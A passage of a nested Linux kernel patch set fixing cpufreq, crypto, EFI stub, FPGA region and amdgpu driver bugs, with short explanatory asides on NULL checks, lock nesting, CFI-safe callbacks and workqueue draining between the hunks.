+--- a/drivers/cpufreq/cppc_cpufreq.c
++++ b/drivers/cpufreq/cppc_cpufreq.c
+@@ -841,10 +841,15 @@ static unsigned int cppc_cpufreq_get_rate(unsigned int cpu)
+ {
+ 	struct cppc_perf_fb_ctrs fb_ctrs_t0 = {0}, fb_ctrs_t1 = {0};
+ 	struct cpufreq_policy *policy = cpufreq_cpu_get(cpu);
+-	struct cppc_cpudata *cpu_data = policy->driver_data;
++	struct cppc_cpudata *cpu_data;
+ 	u64 delivered_perf;
+ 	int ret;
+ 
++	if (!policy)
++		return -ENODEV;
++
++	cpu_data = policy->driver_data;
++
+ 	cpufreq_cpu_put(policy);
+ 
+ 	ret = cppc_get_perf_ctrs(cpu, &fb_ctrs_t0);
+@@ -924,10 +929,15 @@ static struct cpufreq_driver cppc_cpufreq_driver = {
+ static unsigned int hisi_cppc_cpufreq_get_rate(unsigned int cpu)
+ {
+ 	struct cpufreq_policy *policy = cpufreq_cpu_get(cpu);
+-	struct cppc_cpudata *cpu_data = policy->driver_data;
++	struct cppc_cpudata *cpu_data;
+ 	u64 desired_perf;
+ 	int ret;
+ 
++	if (!policy)
++		return -ENODEV;
++
++	cpu_data = policy->driver_data;
++
+ 	cpufreq_cpu_put(policy);
+ 
+ 	ret = cppc_get_desired_perf(cpu, &desired_perf);
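Both get-rate callbacks shared the same hazard: cpufreq_cpu_get() returns NULL once the policy has been torn down (for instance when the CPU went offline), and the old code dereferenced policy->driver_data before checking. The guard pattern, reduced to its essentials with a hypothetical callback:

  static unsigned int example_get_rate(unsigned int cpu)
  {
          struct cpufreq_policy *policy = cpufreq_cpu_get(cpu);
          void *cpu_data;

          if (!policy)            /* lost a race with hotplug */
                  return -ENODEV;

          cpu_data = policy->driver_data; /* safe only after the check */
          cpufreq_cpu_put(policy);
          /* ... query hardware using cpu_data ... */
          return 0;
  }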
+diff --git a/drivers/cpufreq/cpufreq.c b/drivers/cpufreq/cpufreq.c
+index 91efa23e0e8f3..04d89cf0d71df 100644
+--- a/drivers/cpufreq/cpufreq.c
++++ b/drivers/cpufreq/cpufreq.c
+@@ -1619,10 +1619,13 @@ static void __cpufreq_offline(unsigned int cpu, struct cpufreq_policy *policy)
+ 	 */
+ 	if (cpufreq_driver->offline) {
+ 		cpufreq_driver->offline(policy);
+-	} else if (cpufreq_driver->exit) {
+-		cpufreq_driver->exit(policy);
+-		policy->freq_table = NULL;
++		return;
+ 	}
++
++	if (cpufreq_driver->exit)
++		cpufreq_driver->exit(policy);
++
++	policy->freq_table = NULL;
+ }
+ 
+ static int cpufreq_offline(unsigned int cpu)
+@@ -1680,7 +1683,7 @@ static void cpufreq_remove_dev(struct device *dev, struct subsys_interface *sif)
+ 	}
+ 
+ 	/* We did light-weight exit earlier, do full tear down now */
+-	if (cpufreq_driver->offline)
++	if (cpufreq_driver->offline && cpufreq_driver->exit)
+ 		cpufreq_driver->exit(policy);
+ 
+ 	up_write(&policy->rwsem);
+diff --git a/drivers/crypto/bcm/spu2.c b/drivers/crypto/bcm/spu2.c
+index 07989bb8c220a..3fdc64b5a65e7 100644
+--- a/drivers/crypto/bcm/spu2.c
++++ b/drivers/crypto/bcm/spu2.c
+@@ -495,7 +495,7 @@ static void spu2_dump_omd(u8 *omd, u16 hash_key_len, u16 ciph_key_len,
+ 	if (hash_iv_len) {
+ 		packet_log("  Hash IV Length %u bytes\n", hash_iv_len);
+ 		packet_dump("  hash IV: ", ptr, hash_iv_len);
+-		ptr += ciph_key_len;
++		ptr += hash_iv_len;
+ 	}
+ 
+ 	if (ciph_iv_len) {
+diff --git a/drivers/crypto/ccp/sp-platform.c b/drivers/crypto/ccp/sp-platform.c
+index 7d79a8744f9a6..c43ad7e1acf7e 100644
+--- a/drivers/crypto/ccp/sp-platform.c
++++ b/drivers/crypto/ccp/sp-platform.c
+@@ -39,44 +39,38 @@ static const struct sp_dev_vdata dev_vdata[] = {
+ 	},
+ };
+ 
+-#ifdef CONFIG_ACPI
+ static const struct acpi_device_id sp_acpi_match[] = {
+ 	{ "AMDI0C00", (kernel_ulong_t)&dev_vdata[0] },
+ 	{ },
+ };
+ MODULE_DEVICE_TABLE(acpi, sp_acpi_match);
+-#endif
+ 
+-#ifdef CONFIG_OF
+ static const struct of_device_id sp_of_match[] = {
+ 	{ .compatible = "amd,ccp-seattle-v1a",
+ 	  .data = (const void *)&dev_vdata[0] },
+ 	{ },
+ };
+ MODULE_DEVICE_TABLE(of, sp_of_match);
+-#endif
+ 
+ static struct sp_dev_vdata *sp_get_of_version(struct platform_device *pdev)
+ {
+-#ifdef CONFIG_OF
+ 	const struct of_device_id *match;
+ 
+ 	match = of_match_node(sp_of_match, pdev->dev.of_node);
+ 	if (match && match->data)
+ 		return (struct sp_dev_vdata *)match->data;
+-#endif
++
+ 	return NULL;
+ }
+ 
+ static struct sp_dev_vdata *sp_get_acpi_version(struct platform_device *pdev)
+ {
+-#ifdef CONFIG_ACPI
+ 	const struct acpi_device_id *match;
+ 
+ 	match = acpi_match_device(sp_acpi_match, &pdev->dev);
+ 	if (match && match->driver_data)
+ 		return (struct sp_dev_vdata *)match->driver_data;
+-#endif
++
+ 	return NULL;
+ }
+ 
+@@ -214,12 +208,8 @@ static int sp_platform_resume(struct platform_device *pdev)
+ static struct platform_driver sp_platform_driver = {
+ 	.driver = {
+ 		.name = "ccp",
+-#ifdef CONFIG_ACPI
+ 		.acpi_match_table = sp_acpi_match,
+-#endif
+-#ifdef CONFIG_OF
+ 		.of_match_table = sp_of_match,
+-#endif
+ 	},
+ 	.probe = sp_platform_probe,
+ 	.remove = sp_platform_remove,
+diff --git a/drivers/dma-buf/sync_debug.c b/drivers/dma-buf/sync_debug.c
+index 101394f16930f..237bce21d1e72 100644
+--- a/drivers/dma-buf/sync_debug.c
++++ b/drivers/dma-buf/sync_debug.c
+@@ -110,12 +110,12 @@ static void sync_print_obj(struct seq_file *s, struct sync_timeline *obj)
+ 
+ 	seq_printf(s, "%s: %d\n", obj->name, obj->value);
+ 
+-	spin_lock_irq(&obj->lock);
++	spin_lock(&obj->lock); /* Caller already disabled IRQ. */
+ 	list_for_each(pos, &obj->pt_list) {
+ 		struct sync_pt *pt = container_of(pos, struct sync_pt, link);
+ 		sync_print_fence(s, &pt->base, false);
+ 	}
+-	spin_unlock_irq(&obj->lock);
++	spin_unlock(&obj->lock);
+ }
+ 
+ static void sync_print_sync_file(struct seq_file *s,
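The sync_debug change is about lock nesting, not locking less: the caller already disabled interrupts when taking the outer lock, so the nested lock must be a plain spin_lock(); a nested spin_unlock_irq() would re-enable interrupts while the outer IRQ-off section is still live. The correct shape, sketched with hypothetical locks and list:

  static void dump_all_objects(void)
  {
          struct obj *obj;

          spin_lock_irq(&obj_list_lock);          /* IRQs off here   */
          list_for_each_entry(obj, &obj_list, node) {
                  spin_lock(&obj->lock);          /* nested: no _irq */
                  /* ... print obj state ... */
                  spin_unlock(&obj->lock);
          }
          spin_unlock_irq(&obj_list_lock);        /* IRQs on again   */
  }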
+diff --git a/drivers/dma/idma64.c b/drivers/dma/idma64.c
+index af8777a1ec2e3..89e4a3e1d5198 100644
+--- a/drivers/dma/idma64.c
++++ b/drivers/dma/idma64.c
+@@ -594,7 +594,9 @@ static int idma64_probe(struct idma64_chip *chip)
+ 
+ 	idma64->dma.dev = chip->sysdev;
+ 
+-	dma_set_max_seg_size(idma64->dma.dev, IDMA64C_CTLH_BLOCK_TS_MASK);
++	ret = dma_set_max_seg_size(idma64->dma.dev, IDMA64C_CTLH_BLOCK_TS_MASK);
++	if (ret)
++		return ret;
+ 
+ 	ret = dma_async_device_register(&idma64->dma);
+ 	if (ret)
+diff --git a/drivers/extcon/Kconfig b/drivers/extcon/Kconfig
+index 4dd52a6a5b48d..e54e5e64d9abe 100644
+--- a/drivers/extcon/Kconfig
++++ b/drivers/extcon/Kconfig
+@@ -116,7 +116,8 @@ config EXTCON_MAX77843
+ 
+ config EXTCON_MAX8997
+ 	tristate "Maxim MAX8997 EXTCON Support"
+-	depends on MFD_MAX8997 && IRQ_DOMAIN
++	depends on MFD_MAX8997
++	select IRQ_DOMAIN
+ 	help
+ 	  If you say yes here you get support for the MUIC device of
+ 	  Maxim MAX8997 PMIC. The MAX8997 MUIC is a USB port accessory
+diff --git a/drivers/firmware/dmi-id.c b/drivers/firmware/dmi-id.c
+index 940ddf916202a..77a8d43e65d3c 100644
+--- a/drivers/firmware/dmi-id.c
++++ b/drivers/firmware/dmi-id.c
+@@ -169,9 +169,14 @@ static int dmi_dev_uevent(struct device *dev, struct kobj_uevent_env *env)
+ 	return 0;
+ }
+ 
++static void dmi_dev_release(struct device *dev)
++{
++	kfree(dev);
++}
++
+ static struct class dmi_class = {
+ 	.name = "dmi",
+-	.dev_release = (void(*)(struct device *)) kfree,
++	.dev_release = dmi_dev_release,
+ 	.dev_uevent = dmi_dev_uevent,
+ };
+ 
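The dmi-id hunk looks cosmetic but matters under kernel control-flow integrity: an indirect call is only valid when the callee's real prototype matches the function pointer's type, and kfree() takes const void *, not struct device *. A cast hides the mismatch from the compiler but not from the runtime check, hence the thin wrapper whose prototype matches the callback exactly. Schematically:

  void kfree(const void *objp);                   /* real prototype */

  /* mismatch: pointer type != callee type, trips CFI at call time */
  void (*bad_release)(struct device *) =
          (void (*)(struct device *))kfree;

  /* match: a wrapper with exactly the callback's prototype */
  static void good_release(struct device *dev)
  {
          kfree(dev);
  }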
+diff --git a/drivers/firmware/efi/libstub/fdt.c b/drivers/firmware/efi/libstub/fdt.c
+index 70e9789ff9de0..6a337f1f8787b 100644
+--- a/drivers/firmware/efi/libstub/fdt.c
++++ b/drivers/firmware/efi/libstub/fdt.c
+@@ -335,8 +335,8 @@ efi_status_t allocate_new_fdt_and_exit_boot(void *handle,
+ 
+ fail:
+ 	efi_free(fdt_size, fdt_addr);
+-
+-	efi_bs_call(free_pool, priv.runtime_map);
++	if (!efi_novamap)
++		efi_bs_call(free_pool, priv.runtime_map);
+ 
+ 	return EFI_LOAD_ERROR;
+ }
+diff --git a/drivers/firmware/efi/libstub/x86-stub.c b/drivers/firmware/efi/libstub/x86-stub.c
+index 55468debd55d0..f7eb389aeec06 100644
+--- a/drivers/firmware/efi/libstub/x86-stub.c
++++ b/drivers/firmware/efi/libstub/x86-stub.c
+@@ -736,6 +736,26 @@ static void error(char *str)
+ 	efi_warn("Decompression failed: %s\n", str);
+ }
+ 
++static const char *cmdline_memmap_override;
++
++static efi_status_t parse_options(const char *cmdline)
++{
++	static const char opts[][14] = {
++		"mem=", "memmap=", "efi_fake_mem=", "hugepages="
++	};
++
++	for (int i = 0; i < ARRAY_SIZE(opts); i++) {
++		const char *p = strstr(cmdline, opts[i]);
++
++		if (p == cmdline || (p > cmdline && isspace(p[-1]))) {
++			cmdline_memmap_override = opts[i];
++			break;
++		}
++	}
++
++	return efi_parse_options(cmdline);
++}
++
+ static efi_status_t efi_decompress_kernel(unsigned long *kernel_entry)
+ {
+ 	unsigned long virt_addr = LOAD_PHYSICAL_ADDR;
+@@ -767,6 +787,10 @@ static efi_status_t efi_decompress_kernel(unsigned long *kernel_entry)
+ 		    !memcmp(efistub_fw_vendor(), ami, sizeof(ami))) {
+ 			efi_debug("AMI firmware v2.0 or older detected - disabling physical KASLR\n");
+ 			seed[0] = 0;
++		} else if (cmdline_memmap_override) {
++			efi_info("%s detected on the kernel command line - disabling physical KASLR\n",
++				 cmdline_memmap_override);
++			seed[0] = 0;
+ 		}
+ 
+ 		boot_params_ptr->hdr.loadflags |= KASLR_FLAG;
+@@ -843,7 +867,7 @@ void __noreturn efi_stub_entry(efi_handle_t handle,
+ 	}
+ 
+ #ifdef CONFIG_CMDLINE_BOOL
+-	status = efi_parse_options(CONFIG_CMDLINE);
++	status = parse_options(CONFIG_CMDLINE);
+ 	if (status != EFI_SUCCESS) {
+ 		efi_err("Failed to parse options\n");
+ 		goto fail;
+@@ -852,7 +876,7 @@ void __noreturn efi_stub_entry(efi_handle_t handle,
+ 	if (!IS_ENABLED(CONFIG_CMDLINE_OVERRIDE)) {
+ 		unsigned long cmdline_paddr = ((u64)hdr->cmd_line_ptr |
+ 					       ((u64)boot_params->ext_cmd_line_ptr << 32));
+-		status = efi_parse_options((char *)cmdline_paddr);
++		status = parse_options((char *)cmdline_paddr);
+ 		if (status != EFI_SUCCESS) {
+ 			efi_err("Failed to parse options\n");
+ 			goto fail;
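parse_options() only flags an option when it starts the command line or follows whitespace, so a string such as "kmemmap=" cannot false-positive. The same scan as a self-contained user-space function:

  #include <ctype.h>
  #include <stddef.h>
  #include <string.h>

  /* Return the memory-map-affecting option found as a whole word in
   * 'cmdline', or NULL if none is present. */
  static const char *find_memmap_opt(const char *cmdline)
  {
          static const char *const opts[] = {
                  "mem=", "memmap=", "efi_fake_mem=", "hugepages="
          };
          size_t i;

          for (i = 0; i < sizeof(opts) / sizeof(opts[0]); i++) {
                  const char *p = strstr(cmdline, opts[i]);

                  /* accept a hit only at the start or after a space */
                  if (p && (p == cmdline ||
                            isspace((unsigned char)p[-1])))
                          return opts[i];
          }
          return NULL;
  }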
+diff --git a/drivers/firmware/raspberrypi.c b/drivers/firmware/raspberrypi.c
+index dba315f675bc7..ec223976c972d 100644
+--- a/drivers/firmware/raspberrypi.c
++++ b/drivers/firmware/raspberrypi.c
+@@ -9,6 +9,7 @@
+ #include <linux/dma-mapping.h>
+ #include <linux/kref.h>
+ #include <linux/mailbox_client.h>
++#include <linux/mailbox_controller.h>
+ #include <linux/module.h>
+ #include <linux/of_platform.h>
+ #include <linux/platform_device.h>
+@@ -96,8 +97,8 @@ int rpi_firmware_property_list(struct rpi_firmware *fw,
+ 	if (size & 3)
+ 		return -EINVAL;
+ 
+-	buf = dma_alloc_coherent(fw->cl.dev, PAGE_ALIGN(size), &bus_addr,
+-				 GFP_ATOMIC);
++	buf = dma_alloc_coherent(fw->chan->mbox->dev, PAGE_ALIGN(size),
++				 &bus_addr, GFP_ATOMIC);
+ 	if (!buf)
+ 		return -ENOMEM;
+ 
+@@ -125,7 +126,7 @@ int rpi_firmware_property_list(struct rpi_firmware *fw,
+ 		ret = -EINVAL;
+ 	}
+ 
+-	dma_free_coherent(fw->cl.dev, PAGE_ALIGN(size), buf, bus_addr);
++	dma_free_coherent(fw->chan->mbox->dev, PAGE_ALIGN(size), buf, bus_addr);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/fpga/dfl-pci.c b/drivers/fpga/dfl-pci.c
+index 0914e7328b1a5..4220ef00a555e 100644
+--- a/drivers/fpga/dfl-pci.c
++++ b/drivers/fpga/dfl-pci.c
+@@ -79,6 +79,7 @@ static void cci_pci_free_irq(struct pci_dev *pcidev)
+ #define PCIE_DEVICE_ID_SILICOM_PAC_N5011	0x1001
+ #define PCIE_DEVICE_ID_INTEL_DFL		0xbcce
+ /* PCI Subdevice ID for PCIE_DEVICE_ID_INTEL_DFL */
++#define PCIE_SUBDEVICE_ID_INTEL_D5005		0x138d
+ #define PCIE_SUBDEVICE_ID_INTEL_N6000		0x1770
+ #define PCIE_SUBDEVICE_ID_INTEL_N6001		0x1771
+ #define PCIE_SUBDEVICE_ID_INTEL_C6100		0x17d4
+@@ -102,6 +103,8 @@ static struct pci_device_id cci_pcie_id_tbl[] = {
+ 	{PCI_DEVICE(PCI_VENDOR_ID_INTEL, PCIE_DEVICE_ID_INTEL_PAC_D5005_VF),},
+ 	{PCI_DEVICE(PCI_VENDOR_ID_SILICOM_DENMARK, PCIE_DEVICE_ID_SILICOM_PAC_N5010),},
+ 	{PCI_DEVICE(PCI_VENDOR_ID_SILICOM_DENMARK, PCIE_DEVICE_ID_SILICOM_PAC_N5011),},
++	{PCI_DEVICE_SUB(PCI_VENDOR_ID_INTEL, PCIE_DEVICE_ID_INTEL_DFL,
++			PCI_VENDOR_ID_INTEL, PCIE_SUBDEVICE_ID_INTEL_D5005),},
+ 	{PCI_DEVICE_SUB(PCI_VENDOR_ID_INTEL, PCIE_DEVICE_ID_INTEL_DFL,
+ 			PCI_VENDOR_ID_INTEL, PCIE_SUBDEVICE_ID_INTEL_N6000),},
+ 	{PCI_DEVICE_SUB(PCI_VENDOR_ID_INTEL, PCIE_DEVICE_ID_INTEL_DFL_VF,
+diff --git a/drivers/fpga/fpga-region.c b/drivers/fpga/fpga-region.c
+index 27ff9dea04ae3..3aefd9d89356e 100644
+--- a/drivers/fpga/fpga-region.c
++++ b/drivers/fpga/fpga-region.c
+@@ -52,7 +52,7 @@ static struct fpga_region *fpga_region_get(struct fpga_region *region)
+ 	}
+ 
+ 	get_device(dev);
+-	if (!try_module_get(dev->parent->driver->owner)) {
++	if (!try_module_get(region->ops_owner)) {
+ 		put_device(dev);
+ 		mutex_unlock(&region->mutex);
+ 		return ERR_PTR(-ENODEV);
+@@ -74,7 +74,7 @@ static void fpga_region_put(struct fpga_region *region)
+ 
+ 	dev_dbg(dev, "put\n");
+ 
+-	module_put(dev->parent->driver->owner);
++	module_put(region->ops_owner);
+ 	put_device(dev);
+ 	mutex_unlock(&region->mutex);
+ }
+@@ -180,14 +180,16 @@ static struct attribute *fpga_region_attrs[] = {
+ ATTRIBUTE_GROUPS(fpga_region);
+ 
+ /**
+- * fpga_region_register_full - create and register an FPGA Region device
++ * __fpga_region_register_full - create and register an FPGA Region device
+  * @parent: device parent
+  * @info: parameters for FPGA Region
++ * @owner: module containing the get_bridges function
+  *
+  * Return: struct fpga_region or ERR_PTR()
+  */
+ struct fpga_region *
+-fpga_region_register_full(struct device *parent, const struct fpga_region_info *info)
++__fpga_region_register_full(struct device *parent, const struct fpga_region_info *info,
++			    struct module *owner)
+ {
+ 	struct fpga_region *region;
+ 	int id, ret = 0;
+@@ -212,6 +214,7 @@ fpga_region_register_full(struct device *parent, const struct fpga_region_info *
+ 	region->compat_id = info->compat_id;
+ 	region->priv = info->priv;
+ 	region->get_bridges = info->get_bridges;
++	region->ops_owner = owner;
+ 
+ 	mutex_init(&region->mutex);
+ 	INIT_LIST_HEAD(&region->bridge_list);
+@@ -240,13 +243,14 @@ fpga_region_register_full(struct device *parent, const struct fpga_region_info *
+ 
+ 	return ERR_PTR(ret);
+ }
+-EXPORT_SYMBOL_GPL(fpga_region_register_full);
++EXPORT_SYMBOL_GPL(__fpga_region_register_full);
+ 
+ /**
+- * fpga_region_register - create and register an FPGA Region device
++ * __fpga_region_register - create and register an FPGA Region device
+  * @parent: device parent
+  * @mgr: manager that programs this region
+  * @get_bridges: optional function to get bridges to a list
++ * @owner: module containing the get_bridges function
+  *
+  * This simple version of the register function should be sufficient for most users.
+  * The fpga_region_register_full() function is available for users that need to
+@@ -255,17 +259,17 @@ EXPORT_SYMBOL_GPL(fpga_region_register_full);
+  * Return: struct fpga_region or ERR_PTR()
+  */
+ struct fpga_region *
+-fpga_region_register(struct device *parent, struct fpga_manager *mgr,
+-		     int (*get_bridges)(struct fpga_region *))
++__fpga_region_register(struct device *parent, struct fpga_manager *mgr,
++		       int (*get_bridges)(struct fpga_region *), struct module *owner)
+ {
+ 	struct fpga_region_info info = { 0 };
+ 
+ 	info.mgr = mgr;
+ 	info.get_bridges = get_bridges;
+ 
+-	return fpga_region_register_full(parent, &info);
++	return __fpga_region_register_full(parent, &info, owner);
+ }
+-EXPORT_SYMBOL_GPL(fpga_region_register);
++EXPORT_SYMBOL_GPL(__fpga_region_register);
+ 
+ /**
+  * fpga_region_unregister - unregister an FPGA region
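Renaming the exported entry points to __fpga_region_register{,_full}() with an explicit owner follows the usual kernel convention: the public names presumably survive as header macros that inject THIS_MODULE, so every existing caller transparently pins its own module rather than the parent device's driver. A sketch of that convention (assumed here; the header change is not part of this hunk):

  #define fpga_region_register_full(parent, info) \
          __fpga_region_register_full(parent, info, THIS_MODULE)

  #define fpga_region_register(parent, mgr, get_bridges) \
          __fpga_region_register(parent, mgr, get_bridges, THIS_MODULE)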
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+index bebd136ed5444..9a4cbfbd5d9e5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+@@ -1083,6 +1083,7 @@ void amdgpu_mes_remove_ring(struct amdgpu_device *adev,
+ 		return;
+ 
+ 	amdgpu_mes_remove_hw_queue(adev, ring->hw_queue_id);
++	del_timer_sync(&ring->fence_drv.fallback_timer);
+ 	amdgpu_ring_fini(ring);
+ 	kfree(ring);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index 9a111988b7f15..7acf1586882e1 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -585,6 +585,8 @@ int amdgpu_bo_create(struct amdgpu_device *adev,
+ 	else
+ 		amdgpu_bo_placement_from_domain(bo, bp->domain);
+ 	if (bp->type == ttm_bo_type_kernel)
++		bo->tbo.priority = 2;
++	else if (!(bp->flags & AMDGPU_GEM_CREATE_DISCARDABLE))
+ 		bo->tbo.priority = 1;
+ 
+ 	if (!bp->destroy)
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
+index 84a36b50ddd87..f8382b227ad46 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v10_0.c
+@@ -9352,7 +9352,7 @@ static const struct amdgpu_ring_funcs gfx_v10_0_ring_funcs_gfx = {
+ 		7 + /* PIPELINE_SYNC */
+ 		SOC15_FLUSH_GPU_TLB_NUM_WREG * 5 +
+ 		SOC15_FLUSH_GPU_TLB_NUM_REG_WAIT * 7 +
+-		2 + /* VM_FLUSH */
++		4 + /* VM_FLUSH */
+ 		8 + /* FENCE for VM_FLUSH */
+ 		20 + /* GDS switch */
+ 		4 + /* double SWITCH_BUFFER,
+@@ -9445,7 +9445,6 @@ static const struct amdgpu_ring_funcs gfx_v10_0_ring_funcs_kiq = {
+ 		7 + /* gfx_v10_0_ring_emit_pipeline_sync */
+ 		SOC15_FLUSH_GPU_TLB_NUM_WREG * 5 +
+ 		SOC15_FLUSH_GPU_TLB_NUM_REG_WAIT * 7 +
+-		2 + /* gfx_v10_0_ring_emit_vm_flush */
+ 		8 + 8 + 8, /* gfx_v10_0_ring_emit_fence_kiq x3 for user fence, vm fence */
+ 	.emit_ib_size =	7, /* gfx_v10_0_ring_emit_ib_compute */
+ 	.emit_ib = gfx_v10_0_ring_emit_ib_compute,
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 5a5787bfbce7f..1f9f7fdd4b8e0 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -6157,7 +6157,7 @@ static const struct amdgpu_ring_funcs gfx_v11_0_ring_funcs_gfx = {
+ 		7 + /* PIPELINE_SYNC */
+ 		SOC15_FLUSH_GPU_TLB_NUM_WREG * 5 +
+ 		SOC15_FLUSH_GPU_TLB_NUM_REG_WAIT * 7 +
+-		2 + /* VM_FLUSH */
++		4 + /* VM_FLUSH */
+ 		8 + /* FENCE for VM_FLUSH */
+ 		20 + /* GDS switch */
+ 		5 + /* COND_EXEC */
+@@ -6243,7 +6243,6 @@ static const struct amdgpu_ring_funcs gfx_v11_0_ring_funcs_kiq = {
+ 		7 + /* gfx_v11_0_ring_emit_pipeline_sync */
+ 		SOC15_FLUSH_GPU_TLB_NUM_WREG * 5 +
+ 		SOC15_FLUSH_GPU_TLB_NUM_REG_WAIT * 7 +
+-		2 + /* gfx_v11_0_ring_emit_vm_flush */
+ 		8 + 8 + 8, /* gfx_v11_0_ring_emit_fence_kiq x3 for user fence, vm fence */
+ 	.emit_ib_size =	7, /* gfx_v11_0_ring_emit_ib_compute */
+ 	.emit_ib = gfx_v11_0_ring_emit_ib_compute,
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+index 195b298923543..6a1fe21685149 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+@@ -6742,7 +6742,6 @@ static const struct amdgpu_ring_funcs gfx_v9_0_ring_funcs_compute = {
+ 		7 + /* gfx_v9_0_ring_emit_pipeline_sync */
+ 		SOC15_FLUSH_GPU_TLB_NUM_WREG * 5 +
+ 		SOC15_FLUSH_GPU_TLB_NUM_REG_WAIT * 7 +
+-		2 + /* gfx_v9_0_ring_emit_vm_flush */
+ 		8 + 8 + 8 + /* gfx_v9_0_ring_emit_fence x3 for user fence, vm fence */
+ 		7 + /* gfx_v9_0_emit_mem_sync */
+ 		5 + /* gfx_v9_0_emit_wave_limit for updating mmSPI_WCL_PIPE_PERCENT_GFX register */
+@@ -6781,7 +6780,6 @@ static const struct amdgpu_ring_funcs gfx_v9_0_ring_funcs_kiq = {
+ 		7 + /* gfx_v9_0_ring_emit_pipeline_sync */
+ 		SOC15_FLUSH_GPU_TLB_NUM_WREG * 5 +
+ 		SOC15_FLUSH_GPU_TLB_NUM_REG_WAIT * 7 +
+-		2 + /* gfx_v9_0_ring_emit_vm_flush */
+ 		8 + 8 + 8, /* gfx_v9_0_ring_emit_fence_kiq x3 for user fence, vm fence */
+ 	.emit_ib_size =	7, /* gfx_v9_0_ring_emit_ib_compute */
+ 	.emit_fence = gfx_v9_0_ring_emit_fence_kiq,
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_process.c b/drivers/gpu/drm/amd/amdkfd/kfd_process.c
+index 7f68d51541e8e..5bca6abd55aef 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_process.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_process.c
+@@ -823,6 +823,14 @@ struct kfd_process *kfd_create_process(struct file *filep)
+ 	if (process) {
+ 		pr_debug("Process already found\n");
+ 	} else {
++		/* If the process just called exec(3), it is possible that the
++		 * cleanup of the kfd_process (following the release of the mm
++		 * of the old process image) is still in the cleanup work queue.
++		 * Make sure to drain any job before trying to recreate any
++		 * resource for this process.
++		 */
++		flush_workqueue(kfd_process_wq);
++
+ 		process = create_process(thread);
+ 		if (IS_ERR(process))
+ 			goto out;
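The comment in the hunk states the rule; generalized, whenever object teardown is deferred to a workqueue and a new object keyed on the same identity can be created (here, the same task right after exec), the creation path must drain that queue first. A sketch with hypothetical names:

  static struct obj *lookup_or_create(struct task_struct *task)
  {
          struct obj *o = find_obj(task);      /* hypothetical lookup */

          if (o)
                  return o;
          /*
           * A stale instance for this task may still sit in the
           * deferred-cleanup queue; drain it so old and new state
           * never coexist.
           */
          flush_workqueue(cleanup_wq);
          return create_obj(task);
  }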
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index ff460c9802eb2..31bae620aeffc 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -2964,6 +2964,7 @@ static int dm_resume(void *handle)
+ 			dc_stream_release(dm_new_crtc_state->stream);
+ 			dm_new_crtc_state->stream = NULL;
+ 		}
++		dm_new_crtc_state->base.color_mgmt_changed = true;
+ 	}
+ 
+ 	for_each_new_plane_in_state(dm->cached_state, plane, new_plane_state, i) {
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_clk_mgr.c
+index 28b83133db910..09eb1bc9aa030 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_clk_mgr.c
+@@ -131,6 +131,10 @@ static void dcn315_update_clocks(struct clk_mgr *clk_mgr_base,
+ 	 */
+ 	clk_mgr_base->clks.zstate_support = new_clocks->zstate_support;
+ 	if (safe_to_lower) {
++		if (clk_mgr_base->clks.dtbclk_en && !new_clocks->dtbclk_en) {
++			dcn315_smu_set_dtbclk(clk_mgr, false);
++			clk_mgr_base->clks.dtbclk_en = new_clocks->dtbclk_en;
++		}
+ 		/* check that we're not already in lower */
+ 		if (clk_mgr_base->clks.pwr_state != DCN_PWR_STATE_LOW_POWER) {
+ 			display_count = dcn315_get_active_display_cnt_wa(dc, context);
+@@ -146,6 +150,10 @@ static void dcn315_update_clocks(struct clk_mgr *clk_mgr_base,
+ 			}
+ 		}
+ 	} else {
++		if (!clk_mgr_base->clks.dtbclk_en && new_clocks->dtbclk_en) {
++			dcn315_smu_set_dtbclk(clk_mgr, true);
++			clk_mgr_base->clks.dtbclk_en = new_clocks->dtbclk_en;
++		}
+ 		/* check that we're not already in D0 */
+ 		if (clk_mgr_base->clks.pwr_state != DCN_PWR_STATE_MISSION_MODE) {
+ 			union display_idle_optimization_u idle_info = { 0 };
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c
+index 3538973bd0c6c..c0372aa4ec838 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_cm_common.c
